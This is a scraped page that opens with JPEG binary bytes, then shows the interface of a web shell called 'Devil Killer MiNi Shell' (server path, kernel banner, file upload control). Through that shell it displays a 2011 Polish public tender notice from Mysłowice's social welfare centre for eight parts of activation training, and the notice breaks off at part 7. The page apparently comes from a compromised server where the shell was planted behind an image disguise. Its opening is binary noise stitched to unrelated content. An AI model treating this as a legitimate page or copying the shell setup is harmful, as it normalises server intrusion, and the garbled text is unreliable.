JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110317/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110317/47138-N-2011.html

<p class="kh_header"><b>Mysłowice: Szkolenia w zakresie aktywizacji społeczno- zawodowej 
uczestników projektu Mysłowickie lepsze jutro</b><br>
<b>Numer ogłoszenia: 47138 - 2011; data zamieszczenia: 17.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Gwarków 24, 41-400 Mysłowice, woj. śląskie, tel. 032 2221289, faks 032 2221289.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.myslowice.bip.info.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia w zakresie aktywizacji społeczno- zawodowej 
uczestników projektu Mysłowickie lepsze jutro.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
        1. Trening samooceny i motywacji
        2. Doradztwo zawodowe- konsultacje indywidualne
        3. Warsztaty aktywnego poruszania się po rynku pracy
        4. Trening rozwoju kompetencji rodzica
        5. Warsztaty zarządzania gospodarstwem domowym
        6. Szkolenie Motywacja i samorozwój
        7. Indywidualne konsultacje w zakresie problemów psychologicznych
        8. Trening rozwiązywania problemów okresu wchodzenia w dorosłe życie oraz indywidualne konsultacje z edukatorem seksualnym w tym obszarze.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do wniosku należy dołączyć oświadczenie zał. 1 lub 1B</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do wniosku należy dołączyć oświadczenie zał. 1 lub 1B oraz wypełniony załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do wniosku należy dołączyć oświadczenie zał. 1 lub 1B</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do wniosku należy dołączyć oświadczenie zał. 1 lub 1B oraz wypełniony załącznik nr 2A</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do wniosku należy dołączyć oświadczenie zał. 1 lub 1B</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Wykonawcy którzy uzyskają największą liczbę punktów za doświadczenie (D) i kadrę (K).

za doświadczenie D przyznane zostaną punkty wg. następującego wzoru:
D = ilość wykazanych usług szkoleniowych w badanym wniosku/maksymalna ilość wykazanych usług szkoleniowych spośród wszystkich wniosków x 100 pkt x 30%

za kadrę K będą przyznawane punkty wg. następującego wzoru:
K = ilość przeprowadzonych usług szkoleniowych przez osobę, która będzie uczestniczyć w wykonaniu zamówienia/maksymalna ilość przeprowadzonych usług szkoleniowych spośród wszystkich wniosków x 100 pkt x 70%,
Wykazując kadrę będąca prowadzić szkolenia:
dla części 1, 3, 4, 5, 6, 8 mozna wykazać maksymalnie 2 osoby;
dla części 2 i 7 można wykazać maksymalnie 1 osobę.


UWAGA: punktowane będą tylko usługi szkolenia adekwatne do danej części zamówienia w zakresie aktywizacji społeczno zawodowej świadczone Ośrodkom Pomocy Społecznej.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - program - 30</li>
<li>3 - lokalizacja miejsca szkolenia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku niezależnym od wykonawcy dopuszcza się zmianę personelu wykonującego szkolenia na osoby o kwalifikacjach, wykształceniu i doświadczeniu nie gorszym od kwalifikacji, wykształcenia i doświadczenia osób wykazanym we wniosku o dopuszczenie do udziału w postępowaniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.myslowice.bip.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
41-400 Mysłowice
ul. Gwarków 24
pok. 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2011 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej
41-400 Mysłowice
ul. Gwarków 24
sekretariat pok. 27.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Mysłowickie lepsze jutro jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 Mysłowickie lepsze jutro w ramach działania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trening konstruktywnej samooceny i motywacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trening konstruktywnej samooceny i motywacji  ( zwiększenie motywacji do działania, poznanie swoich mocnych i słabych stron, zwiększenie poczucia kontroli nad sytuacjami życiowymi, wzmocnienie samoakceptacji , poczucia pewności siebie)
Czas trwania: 18h (3 spotkania po 6h- 2 spotkania tygodniowo). Termin: 18.04- 29.04.11r.
Przewidywana liczba uczestników: 20
Warunki realizacji: szkolenia powinny odbywać się na terenie Mysłowic (w pobliżu centrum), w 2 grupach szkoleniowych po 10 osób. Podczas szkoleń konieczne będzie zapewnienie opieki dzieciom uczestników oraz cateringu (dla uczestników i ich dzieci- tj. kawa, herbata, woda mineralna, soki- dla dzieci, gorący posiłek). Przewidywana liczba dzieci do opieki:6.  Pod uwagę brane będą następujące czynniki: cena, program, lokalizacja- warunki lokalowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program szkolenia - 30</li>
<li>3. lokalizacja miejsca szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Doradztwo zawodowe- konsultacje indywidualne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Doradztwo zawodowe- konsultacje indywidualne (określenie predyspozycji i preferencji zawodowych, analiza osobowości zawodowej beneficjenta i związany z tym wybór zawodu i ścieżki kształcenia, autoprezentacja- wygląd zewnętrzny, higiena)
Czas trwania: 2h/uczestnika
Termin: maj 2011r
Przewidywana liczba uczestników:29 osób 
 Warunki realizacji: konsultacje  powinny odbywać się na terenie Mysłowic (w pobliżu centrum). Pod uwagę brane będą następujące czynniki: cena, program szkolenia, lokalizacja- warunki lokalowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program szkolenia - 30</li>
<li>3. lokalizacja miejsca szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warsztaty aktywnego poruszania się po rynku pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty aktywnego poruszania się po rynku pracy (techniki aktywnego poszukiwania pracy z uwzględnieniem  specyfiki  lokalnego rynku pracy- zapoznanie z lokalnymi oraz ościennymi instytucjami  pośrednictwa pracy,  techniki autoprezentacji, przygotowanie się do rozmowy z pracodawcą ( higiena, wygląd zewnętrzny), zasady zachowywania się podczas rozmowy kwalifikacyjnej.
Czas trwania: 18h (3 spotkania po 6 h- 2 spotkania tygodniowo). 
Termin: 06.06- 17.06.11r.
Przewidywana liczba uczestników: 29osób (osoby nieaktywne zawodowo, poszukujące pracy)
Warunki realizacji: szkolenia powinny odbywać się na terenie Mysłowic (w pobliżu centrum), w 3 grupach szkoleniowych (10,10 i 9 osób). Podczas szkoleń konieczne będzie zapewnienie opieki dzieciom uczestników oraz cateringu (dla uczestników i ich dzieci- tj. kawa, herbata, woda mineralna, soki- dla dzieci, gorący posiłek). Przewidywana liczba dzieci do opieki:15 Pod uwagę brane będą następujące czynniki: cena, program szkolenia, lokalizacja- warunki lokalowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program szkolenia - 30</li>
<li>3. lokalizacja miejsca szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Trening rozwoju kompetencji rodzica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trening rozwoju kompetencji rodzica (diagnoza samego siebie jako rodzica- uświadomienie sobie indywidualnych błędów wychowawczych oraz wprowadzenie konstruktywnych zmian, stymulowanie rozwoju dziecka- organizacja czasu wolnego, kształtowanie umiejętności społecznych, właściwa higiena osobista oraz odżywianie, problematyka rozwiązywania konfliktów i problemów opiekuńczo- wychowawczych z dziećmi (również niepełnosprawnymi) na różnym etapie ich rozwoju).
Czas trwania: 24h (4 spotkania po 6h- 2 spotkania tygodniowo), w dwóch grupach szkoleniowych (9 i 8 osób).  
Termin: 18.04- 06.05.11r.
Przewidywana liczba uczestników: 17 osób (przedstawiciele rodzin z problemami opiekuńczo- wychowawczymi)




Warunki realizacji: szkolenia powinny odbywać się na terenie Mysłowic (w pobliżu centrum), w 2 grupach szkoleniowych (9 i 8 osób). Podczas szkoleń konieczne będzie zapewnienie opieki dzieciom uczestników oraz cateringu (dla uczestników i ich dzieci- tj. kawa, herbata, woda mineralna, soki- dla dzieci, gorący posiłek). Przewidywana liczba dzieci do opieki:13 Pod uwagę brane będą następujące czynniki: cena, program szkolenia, lokalizacja- warunki lokalowe ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program szkolenia - 30</li>
<li>3. lokalizacja miejsca szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warsztaty zarządzania gospodarstwem domowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty zarządzania gospodarstwem domowym (określenie zadań i obowiązków związanych z prowadzeniem gospodarstwa domowego- nabycie umiejętności w zakresie higieny, zarządzania środkami finansowymi oraz racjonalnego odżywiania) 
Czas trwania: 24h (4 spotkania po 6h- 2 spotkania tygodniowo), w dwóch grupach szkoleniowych (8 i 8    osób).  
         Termin:06.06-17.06 i  20.06- 01.07.11r
        Przewidywana liczba uczestników: 16 osób (przedstawiciele rodzin z problemami opiekuńczo-       wychowawczymi)


Warunki realizacji: szkolenia powinny odbywać się na terenie Mysłowic (w pobliżu centrum), w 2 grupach szkoleniowych (8 i 8 osób). Podczas szkoleń konieczne będzie zapewnienie opieki dzieciom uczestników oraz cateringu (dla uczestników i ich dzieci- tj. kawa, herbata, woda mineralna, soki- dla dzieci, gorący posiłek). Przewidywana liczba dzieci do opieki:13 Pod uwagę brane będą następujące czynniki: cena, program szkolenia, lokalizacja- warunki lokalowe ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program szkolenia - 30</li>
<li>3. lokalizacja miejsca szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Motywacja i samorozwój.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie: Motywacja i samorozwój - rozbudzenie motywacji wewnętrznej do rozwoju osobistego, poznawanie własnych zainteresowań, zwiększenie świadomości odnośnie słabych i mocnych stron, budowanie poczucia własnej wartości, określanie indywidualnego planu samorozwoju oraz aktywizacja uczestników .
Czas  trwania: 16h (4 spotkania po 4h - 1 spotkanie tygodniowo w godz. popołudniowych tj. 16.00- 19.00), w dwóch grupach szkoleniowych po 10 osób. 
Termin: 18.04- 13.05.11r
Przewidywana liczba uczestników: 20 osób (młodzież w wieku 15-24, pochodząca z rodzin zagrożonych wykluczeniem społecznym)
Warunki realizacji: szkolenie powinno odbywać się na terenie Mysłowic (w pobliżu centrum). Podczas szkolenia konieczne będzie  zapewnienie cateringu dla uczestników.  Pod.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program szkolenia - 30</li>
<li>3. lokalizacja miejsca szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Indywidualne konsultacje w zakresie problemów psychologicznych.</p>
